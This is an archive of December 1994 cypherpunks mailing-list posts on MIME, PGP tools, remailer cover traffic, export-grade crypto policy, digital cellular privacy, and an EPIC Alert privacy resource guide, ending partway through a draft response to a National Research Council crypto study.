I started in the spring of 1982 on a VAX 11/780 with real live DEC VT100s, and an ADDS Viewpoint on a 1200 baud modem (at the time, this was really fast) in my dorm room. It was just awful to come back from a week's vacation and spend a whole hour catching up with Usenet--and that was before you could unsubscribe to individual groups :). To a large degree, it's this dozen years of experience with the net that makes me optimistic about things like encryption, MIME, and so on. Every time the baseline moves up, people complain. It happened moving from NCP to TCP/IP. It happened when moving from A News to B News (my site was actually an A News holdout for a long time). It happened when net.* got broken up into a set of hierarchies (alt.* is a remarkably long-lived fragment of that changeover), and it's happening now with things like PGP & MIME. Plus ca change, plus c'est la meme chose. Part of the cypherpunks mission, as I understand it, is to help to keep moving that baseline, concentrating on one particular direction (privacy). I'll stop posting on side issues if it will help keep the focus on privacy, and help keep folks like you from giving up in frustration. After all, cypherpunks is far from the only soapbox I subscribe to :). Amanda Walker InterCon Systems Corporation From harveyrj at vt.edu Fri Dec 16 09:21:43 1994 From: harveyrj at vt.edu (R. J. Harvey) Date: Fri, 16 Dec 94 09:21:43 PST Subject: something NOT MIME-related Message-ID: <9412161721.AA08486@toad.com> Hello: Not to distract from the entertaining MIME thread, but I've got a question that's a little closer to a crypto topic (i.e., software pseudo-random number generators). In the aftermath of the Pentium-can't-divide-accurately flap, I modified a random-number generation routine I'd written to check for the presence of the Pentium divide errors. 
In the process, I put in a routine that did an elementary benchmarking of the chip's performance in both integer (speed to repeatedly execute an empty for-loop 1 million times) and floating point operations (inserting a divide operation in the loop, and adjusting the resulting execution time by subtracting the time required for the empty loop before computing divide-calculations-per-second performance). This is an admittedly very crude benchmark, but I wanted to get some rough idea how many divides could be performed per minute of program execution (i.e., to estimate how long the program could run before a Pentium-problem might occur). Anyway, I found what appeared to be very strange results when comparing performance on my 486/66 versus a 486/25 and 386/20: namely, although the 386 was dead last on both the primarily integer-based empty-for-loop and for-loop-with-divide timings, the 486/25 and 486/66 turned in effectively identical times in the empty-loop benchmark (the 486/66 was about 33% faster than the 486/25 in the divide-based benchmark). All machines were running essentially equivalent versions of Windows for Workgroups. My question is, why would the 486/66 and 25 produce comparable integer-based empty loop performance? I haven't tried a comparable program running under plain-DOS to see if this is somehow Windows related. I suspect there's an easy explanation, but it escapes me. Any suggestions would be greatly appreciated. rj ------------------------------------------------------------------ R. J. Harvey (mail: harveyrj at vt.edu) (PGPkey 0BADDDB5: 82 42 53 EA 97 B0 A2 B2 FC 92 90 BB C2 26 FD 21) From danisch at ira.uka.de Fri Dec 16 09:37:17 1994 From: danisch at ira.uka.de (Hadmut Danisch) Date: Fri, 16 Dec 94 09:37:17 PST Subject: PGP key checking Message-ID: <9412161735.AA06993@elysion.iaks.ira.uka.de> I just signed and checked some pgp keys (using pgp 2.6.1) and I found something unexpected: Keys can be checked with the -kc option. 
To identify the key to be checked either a string or the KeyID (with 0x-prefix) can be given as an argument. If I do now pgp -kc name_of_anyone pgp -kc 0xanyones_key_id for the very same key (once identified by substring, once by keyid, which should both do the same job) the first command checks many more signatures than the second command. The second command stops earlier, but I couldn't find out yet, whether this stops after finding a trusted path to the checked key or what else could be the reason for this. Any ideas? Hadmut From hfinney at shell.portal.com Fri Dec 16 09:54:24 1994 From: hfinney at shell.portal.com (Hal) Date: Fri, 16 Dec 94 09:54:24 PST Subject: Question for remailer operators In-Reply-To: Message-ID: <199412161753.JAA21458@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- lcottrell at popmail.ucsd.edu (Lance Cottrell) writes, quoting Hal: >>I see about 200 messages a day through my remailer, sizes averaging a >>couple of K. I had the impression at one point that the VAST majority of >>this was "cover" traffic that someone is generating just to keep the >>network busy. I don't know if this is still the case. It might be >>possible to opt out of the cover traffic generator to reduce your load >>to a politically manageable level. Maybe people generating cover traffic >>could estimate how many messages they are generating. >I have a script generating covering traffic. It creates a message at random >intervals between 1 and 20 min. The messages are encrypted, and padded with >cutmarks for all remailers which support that. The messages are sent >through six hops. The remailers are chosen from all reasonably reliable >remailers on Raph Levine's list (except for those which have asked to be >excluded). So, if the average interval is 10 minutes, that would be 6 messages per hour or 6*24 = 144 messages a day. 
Each message goes through 6 of probably a dozen or so remailers or about half of them, so that would be about 70 messages per remailer per day from your script. My count above is of messages through both the alumni and portal remailers, so that would be about 140 from you out of around 200 or about 70% from your script. If you have more or less than a dozen remailers to choose from that would affect this figure. I really think this script is overkill at the current time. Each message has to be decrypted and dispatched, and this makes the remailer pretty conspicuous. I think the script could slow the acceptance of remailers. In any case, I think I will ask you to take the alumni.caltech and shell.portal remailers off of your list. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLvHTsBnMLJtOy9MBAQGinQH+Nlf23RsSpQ1SZozusuxo27Hb8lPIRAjI NXRDS0sX2OcHdu0v5clbVsG8SVypA111+/FskTLGc7BsBaFwXAWRpQ== =iD1C -----END PGP SIGNATURE----- From mark at unicorn.com Fri Dec 16 10:00:37 1994 From: mark at unicorn.com (Mark Grant) Date: Fri, 16 Dec 94 10:00:37 PST Subject: Privtool 0.83 Released Message-ID: Sorry to bring the list back to cryptography, but there's now a new version of Privtool (PGP-aware mailer for Xview) on ftp.c2.org in /pub/privtool/privtool-0.83.tar.Z. This version has two major fixes which greatly improve performance and reduce memory usage, along with a number of minor fixes. In the next few days I'll upload it to ftp.dsi.unimi.it and update the on-line documentation on my WWW site. Mark P.S. No, it doesn't support MIME. From m5 at vail.tivoli.com Fri Dec 16 10:04:16 1994 From: m5 at vail.tivoli.com (Mike McNally) Date: Fri, 16 Dec 94 10:04:16 PST Subject: Kaufman/Eastlake DNS changes In-Reply-To: <9412161608.AA03398@sulphur.osf.org> Message-ID: <9412161804.AA07410@vail.tivoli.com> Rich Salz writes: > As a side note, it's too bad that Digital seems to have lost all of > their crypto-folks. 
Those folks, I suppose, were all hired *after* the decision was made to encode RSTS passwords with simple radix-50... | GOOD TIME FOR MOVIE - GOING ||| Mike McNally | | TAKE TWA TO CAIRO. ||| Tivoli Systems, Austin, TX: | | (actual fortune cookie) ||| "Like A Little Bit of Semi-Heaven" | From warlord at MIT.EDU Fri Dec 16 10:25:54 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Fri, 16 Dec 94 10:25:54 PST Subject: [Cynthia Clark: RE: I-D ACTION:draft-pgp-pgpformat-00.txt] Message-ID: <9412161825.AA12898@toxicwaste.media.mit.edu> I think that most cypherpunks would be interested in this. I realize that many of you are on the IETF announcement list and probably have already seen this, but I thought that I'd forward it for those of you who aren't on it... -derek ------- Forwarded Message A New Internet-Draft is available from the on-line Internet-Drafts directories. Title : PGP Message Exchange Formats Author(s) : D. Atkins, W. Stallings, P. Zimmermann Filename : draft-pgp-pgpformat-00.txt Pages : 21 Date : 12/13/1994 PGP (Pretty Good Privacy) uses a combination of public-key and conventional encryption to provide security services for electronic mail messages and data files. These services include confidentiality and digital signature. PGP is widely used throughout the global computer community. This document describes the format of "PGP files", i.e., messages that have been encrypted and/or signed with PGP. PGP was created by Philip Zimmermann and first released, in Version 1.0, in 1991. Subsequent versions have been designed and implemented by an all-volunteer collaborative effort under the design guidance of Philip Zimmermann. PGP and Pretty Good Privacy are trademarks of Philip Zimmermann. Internet-Drafts are available by anonymous FTP. Login with the username "anonymous" and a password of your e-mail address. After logging in, type "cd internet-drafts" and then "get draft-pgp-pgpformat-00.txt". 
A URL for the Internet-Draft is: ftp://ds.internic.net/internet-drafts/draft-pgp-pgpformat-00.txt Internet-Drafts directories are located at: o Africa Address: ftp.is.co.za (196.4.160.2) o Europe Address: nic.nordu.net (192.36.148.17) o Pacific Rim Address: munnari.oz.au (128.250.1.21) o US East Coast Address: ds.internic.net (198.49.45.10) o US West Coast Address: ftp.isi.edu (128.9.0.32) Internet-Drafts are also available by mail. Send a message to: mailserv at ds.internic.net. In the body type: "FILE /internet-drafts/draft-pgp-pgpformat-00.txt". NOTE: The mail server at ds.internic.net can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e., documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. For questions, please mail to Internet-Drafts at cnri.reston.va.us. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. 
- --NextPart Content-Type: Multipart/Alternative; Boundary="OtherAccess" - --OtherAccess Content-Type: Message/External-body; access-type="mail-server"; server="mailserv at ds.internic.net" Content-Type: text/plain Content-ID: <19941213160355.I-D at CNRI.Reston.VA.US> ENCODING mime FILE /internet-drafts/draft-pgp-pgpformat-00.txt - --OtherAccess Content-Type: Message/External-body; name="draft-pgp-pgpformat-00.txt"; site="ds.internic.net"; access-type="anon-ftp"; directory="internet-drafts" Content-Type: text/plain Content-ID: <19941213160355.I-D at CNRI.Reston.VA.US> - --OtherAccess-- - --NextPart-- ------- End of Forwarded Message From eric at remailer.net Fri Dec 16 10:35:47 1994 From: eric at remailer.net (Eric Hughes) Date: Fri, 16 Dec 94 10:35:47 PST Subject: Thoughts on 15 day CJ crypto Message-ID: <199412161933.LAA09366@largo.remailer.net> As most of you know, the SPA/NSA deal for auto-approved export requires 512 bit RSA and 40 bit RC4. Everyone knows that 40 bit RC4 is weak cryptographically, but no one particularly thought that 512 bits RSA was -- weakening, maybe, but not down in the real-time crack range. I had an insight yesterday as to that particular requirement. Consider the standard kind of way that one uses a hybrid crypto system. The secret session key is encrypted with the public key. There are now two ciphers that can be broken. And you only need to break one of them. So the NSA breaks 40-bit RC4 by brute force. The keyspace is small. What is left unsaid about the search is that candidate decryption keys need to be selected. You can't do a ciphertext only attack if the plaintext is random bits. The 512 bit RSA can be used to verify candidate keys. Doing 2^40 modexp's is probably not how it's done (but it might be), but if you can eliminate the bulk of candidate RC4 keys in some other way (by looking at trial decryptions) then you've got a way of verifying the rest of them. 
If trial decryption can eliminate, say, one of every hundred or thousand keys then the RSA verification could be done in real time. So it's possible the RSA requirement is in there to provide an assurance that the right key was selected. Eric From amanda at intercon.com Fri Dec 16 11:52:57 1994 From: amanda at intercon.com (Amanda Walker) Date: Fri, 16 Dec 94 11:52:57 PST Subject: Thoughts on 15 day CJ crypto Message-ID: <9412161454.AA07036@chaos.intercon.com> > So it's possible the RSA requirement is in there to provide an > assurance that the right key was selected. I would be fairly surprised if this weren't the case, since it allows trial decryption to be done completely without human intervention. This would speed up the cycle time (and reduce the resources needed) for decrypting intercepts, with more reliability than a straight statistical check on the candidate plaintext. Amanda Walker InterCon Systems Corporation From banisar at washofc.epic.org Fri Dec 16 12:22:30 1994 From: banisar at washofc.epic.org (Dave Banisar) Date: Fri, 16 Dec 94 12:22:30 PST Subject: EPIC Alert 1.08 Message-ID: <00541.2870433981.1521@washofc.epic.org> Date 12/16/94 Subject EPIC Alert 1.08 From Dave Banisar To info ============================================================ Volume 1.08 December 16, 1994 ------------------------------------------------------------ Published by the Electronic Privacy Information Center (EPIC) Washington, DC ======================================================================= Table of Contents: Special Issue: Privacy Resources ======================================================================= [1] Privacy Organizations [2] Publications [3] Net Sites for Privacy [4] Privacy Mailing Lists and Newsgroups [5] Donations for EPIC [6] 
Upcoming Conferences and Events A regularly updated version of this issue will be available at http://epic.digicash.com/epic and at cpsr.org /cpsr/privacy/epic/privacy_resources.faq. This issue is also available in html format from http://epic.digicash.com/epic Send additions, suggestions to alert at epic.org. ======================================================================= [1] Privacy Organizations ======================================================================= Electronic Privacy Information Center. EPIC was established in 1994 to focus public attention on emerging privacy issues relating to the National Information Infrastructure, such as the Clipper Chip, the Digital Telephony proposal, medical records privacy and the sale of consumer data. EPIC conducts litigation, sponsors conferences, produces reports, publishes the EPIC Alert and leads campaigns on privacy issues. For more info, email: info at epic.org, or HTTP://epic.digicash.com/epic. EPIC, 666 Penn. Ave, SE, Suite 301, Washington, DC 20003. (202) 544-9240 (tel). Director: Marc Rotenberg. Privacy International. An international human rights group based in London, England with offices in Washington, DC and Sydney, Australia. PI has members in over 40 countries and has led campaigns against privacy violations in numerous countries including Australia, New Zealand, and the Philippines. PI publishes the International Privacy Bulletin and sponsors international conferences on privacy issues. Email pi at epic.org. Privacy International c/o EPIC, 666 Penn. Ave, SE, Suite 301, Washington, DC 20003. Director General: Simon Davies. US Privacy Council. A coalition of US privacy groups and individuals founded in 1991 to deal with privacy issues in the US. USPC works in Washington monitoring legislation and the activities of government agencies. USPC works closely with other groups on privacy issues including National ID cards, reforming credit reporting, Caller ID and international issues. 
Email: privtime at access.digex.net. P.O. Box 15060, Washington, DC 20003. (202) 829-3660 (tel). Chair: Evan Hendricks. Privacy Rights Clearinghouse. A California-based organization formed in 1992. The Clearinghouse has produced many fact sheets and an annual report, and maintains a toll free hotline to provide advice to consumers about their rights. Email: prc at teetot.acusd.edu. 5998 Alcala Park, San Diego, CA 92110. (619) 260-4806 (tel). 800-773-7748 (in Cal. only). Director: Beth Givens. Computer Professionals for Social Responsibility. A national membership organization of people concerned about the impact of technology on society. CPSR sponsors an annual conference, maintains numerous mailing lists on computer-related issues, a large internet site of information and publishes a quarterly newsletter. It has 24 local chapters across the US and several international affiliates. CPSR sponsors working groups on civil liberties, working in the computer industry and others. Contact: cpsr-info at cpsr.org. PO Box 717, Palo Alto, CA 94301. (415) 322-3778 (tel). Managing Director: Kathleen Kells. Internet Society. Group dedicated to fostering evolution of the Internet and its use. Sponsors yearly conference, publishes excellent quarterly newsletter, works with standards committees to develop Internet standards for networking and privacy. Email: isoc at isoc.org. http://info.isoc.org/ 12020 Sunrise Valley Drive, Suite 270, Reston, VA 22091. (703) 648-9888 (tel). Executive Director: Anthony Rutkowski. Electronic Frontier Foundation. Formed in 1990. Maintains an Internet site, publishes an electronic newsletter, and lobbies in Washington. Email: info at eff.org. 1667 K St. NW, Suite 801, Washington, DC 20006-1605 USA 202-347-5400 (tel). Director: Andrew Taubman. American Civil Liberties Union. National civil liberties organization. Originally founded in 1920, the ACLU conducts extensive litigation on Constitutional issues including privacy, and free speech. 
The ACLU Washington office lobbies Congress for civil liberties and civil rights issues. Email: infoaclu at aclu.org. 322 Eighth Ave, New York, NY 10001. Executive Director: Ira Glasser. Cypherpunks. Informal group that develops technological solutions to protect privacy. The Cypherpunks write cryptography and other programs, set up anonymous remailers and discuss political and technical issues. Meetings are also regularly held in California and other states. ftp/gopher soda.berkeley.edu Voters Telecom Watch. NY based cyber-rights lobbying group. In 1994 lobbied against the FBI Wiretap bill and for relaxation of export controls on cryptography. Affiliated with Society for Electronic Access. Contact: shabbir at panix.com Society for Electronic Access. NY-based electronic civil liberties organization promotes "civil liberties and access in cyberspace". Email: sea at sea.org or http://www.panix.com/sea. P.O. Box 7081, New York, NY 10116-7081. (212) 592-3801. President: Simona Nass. EFF Austin. Austin, TX-based, electronic civil liberties organization founded in 1990. Purpose is to engage in and support educational activities that promote a clearer understanding of the social, legal, and technical issues surrounding online telecommunications. Contact: eff-austin at zilker.net or (gopher/ftp).zilker.net. Also see newsgroup austin.eff. PO Box 18957, Austin, TX 78760. President: David Smith. ======================================================================= [2] Publications ======================================================================= Privacy Times. Biweekly newsletter on information law. Each issue covers developments related to privacy and information access, including summaries of court decisions on the Freedom of Information Act and other relevant statutes. Editor: Evan Hendricks. Address: P.O. Box 21501, Washington, DC 21501. (202) 829-3660. Cost: $250/Year Privacy Journal. A monthly journal on mainly US privacy, now in its 20th year of publication. 
Editor: Robert Ellis Smith. P.O. Box 28577, Providence, RI 02908. (401) 274-7861 (tel). Cost: $109/year. The PJ also publishes numerous books and compendiums on privacy including its excellent yearly Compilation of State and Federal Laws. International Privacy Bulletin. Published quarterly by Privacy International. The IPB covers international trends and new technologies. Each issue also includes reports from different countries and reviews of new publications. Editor: Dave Banisar. 666 Penn. Ave, SE #301, Washington, DC 20003. (202) 544-9240 (tel). Cost: $50/year individuals, $200/year organizations. Privacy and American Business. Published bi-monthly. A new publication provides the industry perspective on privacy. Editor: Bob Belair. Bimonthly with special issues. Two University Plaza, Suite 414, Hackensack, NJ 07601. (201) 996-1154 (tel). Cost: $395/year. Full Disclosure. A monthly newspaper on surveillance and civil liberties issues. Editor: Glen Roberts. Box 734, Antioch, IL 60002. (708) 395-6200. Cost: $29.95/year. Low Profile. Asset protection and financial privacy. Published monthly. Editor: Mark Nestman. P.O. Box 84910, Phoenix, AZ 85701. 702-333-5942 (tel). Cost: $149/year. Privacy and Security 2001. Technical aspects of privacy and security. Focuses on electronic surveillance and counter-measures with recent assaults on privacy highlighted. Editor Jim Ross. 504 Shaw Road, Suite 222, Sterling, VA 20166. (703) 318-8600. 10/year. $35/year. 2600 Magazine. Inside technical information on telephone and computer network operations. Published quarterly. Editor: Emmanual Goldstein. Email 2600 at well.sf.ca.us. P.O. Box 752, Middle Island, NY 11953. Cost:$21/year. Privacy Law and Policy Reporter. A well written, law-oriented overview of privacy developments in NZ and Australia. 10 issues/year. Level 11, Carlton Centre, 55-63 Elizabeth Street, Sydney, NSW 2000, Australia. 61-2-221-6199 (tel). Cost: $AZ 345 Transnational Data and Communications Report. 
Bimonthly international overview of privacy, data protection, telecommunications and information access. Editor: Russell Pipe. P.O. Box 10528, Burke VA 22009-0528. Cost: $280/year. Privacy Laws and Business. A quarterly comprehensive overview of privacy issues in Europe. Focuses mainly on regulatory and data protection from a business perspective. Editor: Stewart Dresner. Cost: 3 Central Avenue, Pinner, Middlesex HA5 5BT United Kingdom. 44-81-866-8641 (tel). $UK 240/year. ======================================================================= [3] Net Sites ======================================================================= ACLU On-line Reading Room. Files on civil liberties. ftp/gopher aclu.org CPSR Internet Library. Maintains the online archives for CPSR, EPIC Privacy International and others. FTP/Gopher/WAIS/HTTP cpsr.org /cpsr Cypherpunks. Archives on cryptography and other privacy technologies. ftp/gopher soda.berkeley.edu Electronic Frontier Foundation Archives. Archives on privacy, free speech, underground newsletters. http://WWW.eff.org, FTP: ftp.eff.org Electronic Privacy Information Center. Includes back issues of EPIC Alert, privacy resources, legislation, and articles. http://www.epic.digicash.com/ Privacy Rights Clearinghouse. http://www.manymedia.com/prc/ E-mail: prc at teetot.acusd.edu. Gopher: gopher.acusd.edu FTP:ftp.acusd.edu. Telnet: teetot.acusd.edu (local> c teetot, login: privacy). BBS: 619-260-4670 (same login as telnet). ======================================================================= [4] Electronic Newsgroups and Mailing Lists ======================================================================= Unmoderated Newsgroups and mailing lists: Alt.privacy. Unmoderated discussion on privacy. High traffic, low content. Alt.privacy clipper. Unmoderated discussion of the Clipper chip and encryption policy. Comp.org.cpsr.talk. Unmoderated discussion of issues related to the Computer Professionals for Social Responsibility. 
Topics include privacy, the NII, telecommunications reform and social implications of technology. Comp.org.eff.talk. Unmoderated discussion of issues related to the Electronic Frontier Foundation. Cypherpunks Mailing list. Discussion of cryptography and technical protections of privacy. Warning: High Traffic (100+ messages/day). Sci.crypt. Unmoderated technical discussion of encryption. talk.politics.crypto. Unmoderated discussion of the Clipper chip and encryption policy. Moderated Newsletters and Digests: EPIC Alert. Biweekly electronic newsletter of the Electronic Privacy Information Center. Mail to listserv at cpsr.org. 1st line: subscribe cpsr-announce. Back issues at cpsr.org /cpsr/alert and http://www.epic.digicash.com/ CPSR-Global. A new CPSR sponsored mailing list on Global information infrastructure issues. Moderator: Marsha Woodbury. To subscribe, email listserv at cpsr.org with the 1st line: subscribe cpsr-global Risks Digest. Moderated digest on risks to the public using computers and related systems. Newsgroup: comp.risk. Also available as mailing list from email: risks-request at csl.sri.com 1st line: SUBSCRIBE. Back Issues at ftp unix.sri.com /risks. Moderator: Peter Neumann. Computer Privacy Digest. Moderated digest on privacy. Newsgroup: comp.society.privacy. at wam.uwm.edu. Moderator: Len Levine. To Subscribe, email: comp-privacy-request at uwm.edu, 1st line "subscribe" Back issues gopher: gopher.cs.uwm.edu, ftp: ftp.cs.uwm.edu/comp-priv. Computer Underground Digest. Weekly moderated digest on computer underground, privacy, free speech issues. Newsgroup: comp.society.cu-digest. Email at LISTSERV at VMD.CSO.UIUC.EDU, 1st line: SUB CUDIGEST . Back issues at etext.archive.umich.edu /pub/CuD/. Moderator: Jim Thomas. Computer Privacy Forum. Moderated digest on privacy sponsored by ACM. To subscribe, send message: help to privacy-request at vortex.com. Back issues at ftp.vortex.com /privacy or http://www.vortex.com/. Moderator: Lauren Weinstein. 
Comp.org.cpsr.announce. Moderated mailing list for CPSR. Includes EPIC Alert, and other CPSR newsletters and releases. Also available as mailing list. See EPIC Alert for subscription info. VTW Announce. Moderated mailing list of Voters Telecomm Watch. Email listproc at panix.com, 1st line of the message: SUBSCRIBE VTW-ANNOUNCE . ======================================================================= [5] Contributions to EPIC ======================================================================= If you'd like to support the work of the Electronic Privacy Information Center, contributions are welcome and fully tax-deductible. Checks should be made out to "The Fund for Constitutional Government" and sent to EPIC, 666 Pennsylvania Ave., SE, Suite 301, Washington DC 20003. Your contributions will help support Freedom of Information Act litigation, strong and effective advocacy for the right of privacy and efforts to oppose Clipper and Digital Telephony wiretapping proposals. ======================================================================= [6] Upcoming Privacy Related Conferences and Events ======================================================================= 1995 Data Security Conference. Jan 9-11, 1995. Redwood City, CA. Sponsored by RSA Data Security. Contact: kurt at rsa.com. Second International Conference on Information Warfare: "Chaos on the Electronic Superhighway" Jan 18-19, Montreal, CA. January 18, 1995, Sponsored by NCSA. Contact: Mich Kabay (75300.3232 at compuserve.com). Privacy, The Information Infrastructure and Healthcare Reform, Ohio State University, Columbus, OH, Jan. 27. Contact: vberdaye at magnus.acs.ohio-state.edu. Towards an Electronic Patient Record '95. Orlando, FL. Mar. 14-19, 1995. Sponsored by Medical Records Institute. Contact: 617-964-3926 (fax). Access, Privacy, and Commercialism: When States Gather Personal Information, College of William and Mary, Williamsburg, VA, March 17. Contact: Trotter Hardy 804 221-3826. 
Computers, Freedom and Privacy '95. Palo Alto, Ca. Mar. 28-31, 1995. Sponsored by ACM. Contact: cfp95 at forsythe.stanford.edu. ETHICOMP95: An international conference on the ethical issues of using Information Technology, DeMontfort University, Leicester, ENGLAND, March 28-30, 1995. Contact: Simon Rogerson srog at dmu.ac.uk 44 533 577475 (phone) 44 533 541891 (Fax). 1995 IEEE Symposium on Security and Privacy, Oakland, CA, May 8-10. Contact: sp95 at itd.nrl.navy.mil. INET '95. Honolulu, HI. June 28-30, 1995. Sponsored by the Internet Society. Contact inet95 at isoc.org. Key Players in the Introduction of Information Technology: Their Social Responsibility and Professional Training. July 5-6-7, 1995. Namur, Belgium. Sponsored by CREIS. Contact: nolod at ccr.jussieu.fr. (Send calendar submissions to Alert at epic.org) ======================================================================= The EPIC Alert is a free biweekly publication of the Electronic Privacy Information Center. To subscribe, send the message: SUBSCRIBE CPSR-ANNOUNCE Firstname Lastname to listserv at cpsr.org. You may also receive the Alert by reading the USENET newsgroup comp.org.cpsr.announce. Back issues are available via FTP/WAIS/Gopher/HTTP from cpsr.org /cpsr/alert and on Compuserve at Keyword: NCSA, Library 2 (EPIC/Ethics). A HTML version of the current issue is available from epic.digicash.com/epic ======================================================================= The Electronic Privacy Information Center is a public interest research center in Washington, DC. It was established in 1994 to focus public attention on emerging privacy issues relating to the National Information Infrastructure, such as the Clipper Chip, the Digital Telephony proposal, medical record privacy, and the sale of consumer data. EPIC is sponsored by the Fund for Constitutional Government and Computer Professionals for Social Responsibility. 
EPIC publishes the EPIC Alert and EPIC Reports, pursues Freedom of Information Act litigation, and conducts policy research on emerging privacy issues. For more information, email info at epic.org, WWW at HTTP://epic.digicash.com /epic or write EPIC, 666 Pennsylvania Ave., SE, Suite 301, Washington, DC 20003. (202) 544-9240 (tel), (202) 547-5482 (fax).

The Fund for Constitutional Government is a non-profit organization established in 1974 to protect civil liberties and constitutional rights. Computer Professionals for Social Responsibility is a national membership organization of people concerned about the impact of technology on society. For information contact: cpsr-info at cpsr.org

------------------------ END EPIC Alert 1.08 ------------------------

_________________________________________________________________________
Subject: EPIC Alert 1.08
_________________________________________________________________________
David Banisar (Banisar at epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center    * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301      * ftp/gopher/wais/HTTP
Washington, DC 20003                     * cpsr.org /cpsr/privacy/epic

From anonymous-remailer at shell.portal.com Fri Dec 16 12:47:04 1994
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 16 Dec 94 12:47:04 PST
Subject: Digital privacy
Message-ID: <199412162046.MAA11758@jobe.shell.portal.com>

So I was netsurfing and came across CellularOne's home page. So I thought I'd do a little investigative work...this is the same company which advertises that your digital phone conversation is private even in a crowded restaurant! Here's what its WWW server had to say:

>The Difference Digital Makes
>
>Cellular phones play an indispensable role in everyday life in the 1990s. But
>what exactly does digital technology bring to the table?
>
>Static meets its match. Since digital transmission only recognizes and converts
>variations in the human voice, static is virtually eliminated. Voices come
>through loud and clear. Background noise isn't just reduced, it's virtually
>eliminated. So is cross-talk.
>
>Capacity three times. Ultimately, digital technology will triple the size of
>the cellular phone information highway. So as we convert, more room will be
>freed up for more of your important calls. Resulting in more calls going
>through faster. On the first try. And fewer calls being dropped.
>
>Pssst, what about privacy? Again, since your voice is digitally processed, it's
>less likely that anyone could eavesdrop on your conversations.
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

?Como? This is absolutely amazing!

======================Herodotus=====================
Great deeds are usually wrought at great risks.
====================================================

From amanda at intercon.com Fri Dec 16 13:24:55 1994
From: amanda at intercon.com (Amanda Walker)
Date: Fri, 16 Dec 94 13:24:55 PST
Subject: Digital privacy
Message-ID: <9412161623.AA23186@chaos.intercon.com>

> >Pssst, what about privacy? Again, since your voice is digitally
> >processed, it's less likely that anyone could eavesdrop on
> >your conversations.
>  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>
> ?Como? This is absolutely amazing!

Well, it is true, from a pragmatic point of view. A neighborhood kid with a Radio Shack scanner can't listen in on digital cellular calls. You have to actually hack a phone, which is a much less prevalent skill.

I still think that CDMA+DES is the way to go for secure cellular, but from a purely pragmatic point of view simply going digital does increase privacy. Using analog cellular is like using a walkie-talkie.
Amanda Walker InterCon Systems Corporation From adam at bwh.harvard.edu Fri Dec 16 13:38:30 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Fri, 16 Dec 94 13:38:30 PST Subject: NAS Crypto study Message-ID: <199412162138.QAA00607@bwnmr5.bwh.harvard.edu> Last week, the National Research Council posted a question to cypherpunks, asking for opinions. Here's mine (draft form) , I invite comments before I send it in. Adam NAS crypto question 1 ? How, if at all, do capabilities enabled by new and emerging ? technology in telecommunications (e.g., key-escrow ? encryption technologies, digital telephony) and electronic ? networking make it _easier_ for those who control that ? technology to compromise and/or protect the interests of ? individual end users? Please use as the standard of ? comparison the ease _today_ of compromising or ? protecting these interests. We are interested in ? scenarios in which these interests might be compromised ? or protected both individually and on a large scale. Please ? be sure to tell us the interests you believe are at stake. There are several areas in which the privacy of users is being changed by new technologies. The control of the new technologies is fundamental to privacy issues. When control is held by service providers, interests of the end users fall by the wayside. When that control is distributed, then the end users, naturally, have the ability to protect their own interests. Control of technology does not need to be held by service providers, the government, or any other centralized entity. It can be taken, today, by individuals who are concerned enough to do so. I will use as my basis for comparison the ease of compromising the interests of an individual who chooses to protect their communications with the tools available to them, mainly PGP and the remailer network. These tools are not yet trivially easy to use, but they are out there and they are being improved. 
Since those tools are available today to those who are interested, I will use them as a baseline against which centralized 'security' can be compared. The FBI wiretapping bill creates a new power for government - the right to tap phones. The change is a subtle one with large implications. It creates an additional array of points of failure for a possibly secure network. Law enforcement agents today have the ability, acquired yesterday through an accident of technology, to tap phones. That does not mean that ability should be preserved. It is widely known that this ability has been, and probably still is, abused.[1] (What do you call an illegal wiretap? An anonymous informant.) GAK (Government Access to Keys) codifies a similar accident; that networks are insecure becomes a design feature. [1] I'll be adding references to Bamford & Kahn. In such a centrally controlled system, there will be points where the entire system can fail. Those points of failure could expose an entire population of users to information leaks. They may be well protected, but even the NSA has had agents defect. This model is in stark contrast to the situation today, where individuals can take responsibility for their own encryption. If there is no centralized back door, no database of keys, LEA fields, and the like, then the security of each key must be breached where it is likely to be best protected, namely in the possession of its user. I would understand the value of my private keys to me, and not disclose them. Thus we have made it substantially easier to damage the interests of end users, while not adding anything to their protection. You could argue that the government has an excellent track record in protecting information. This is only partly true. The government did an excellent job of covering up radiation tests on the mentally ill; it has done a poor job of concealing Social Security numbers, which the IRS prints on the outside of tax documents, claiming the US mail is secure[2]. 
Only when there are institutional interests at stake does the government show any interest in protecting information about citizens. Doubtlessly, accidental or illegal revelation of keys would be carefully classified, along with the names of the affected individuals. [2] I'll be adding a reference to RISKS digests. The bureaucrat, not having a personal stake in the security of the keys, will be more lax than an individual. No one believes that agents of the government will look out for them as well as they look out for themselves. If they did, perhaps we'd all be happy to let the IRS compute our taxes. It would sure make life easier. But we don't. The individual is always the best protector of their own interests. To hammer on the point, there have been repeated cases of INS employees selling green cards, FBI agents who create rules of engagement later found unconstitutional, and agents of every three letter agency in Washington have sold out to the Russians. To quote an NSA historian who I spoke with about Aldrich Ames at the NSA museum, "It's amazing how cheaply someone will betray their country." If we mandate backdoors in a system, they will be found and exploited. Give end users control of the technology, including source code and access to algorithms, and they are empowered to choose a level of security that is appropriate. The government can not do so, and should not try. A few scenarios to illustrate better my points. ******************* Postulate the existence of a rich and powerful drug lord. He has millions of dollars to protect his large shipments. Let's call him Pablo. Pablo decides he needs to listen in on DEA conversations. Plot A: put in place a system of GAK (government access to keys.) Let's call it Clipper, for convenience. Let's also say that the DEA is using Clipper to protect its phone conversations about Pablo. Pablo finds a low level employee of some key escrow agency. Let's call him Aldrich. 